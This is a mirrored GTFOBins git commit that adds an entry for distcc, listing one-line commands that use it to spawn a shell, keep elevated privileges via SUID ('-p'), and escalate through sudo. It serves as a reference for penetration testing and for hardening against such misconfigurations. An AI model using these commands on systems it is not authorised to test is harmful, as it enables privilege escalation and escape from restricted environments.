1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

add distcc

install: apt-get install -y distcc
man: https://linux.die.net/man/1/distcc
This commit is contained in:
Miguel R 2023-02-05 13:41:57 +01:00 committed by Andrea Cardaci
parent 57114a423c
commit 1f52a21411

9
_gtfobins/distcc.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: distcc /bin/sh
suid:
- code: ./distcc /bin/sh -p
sudo:
- code: sudo distcc /bin/sh
---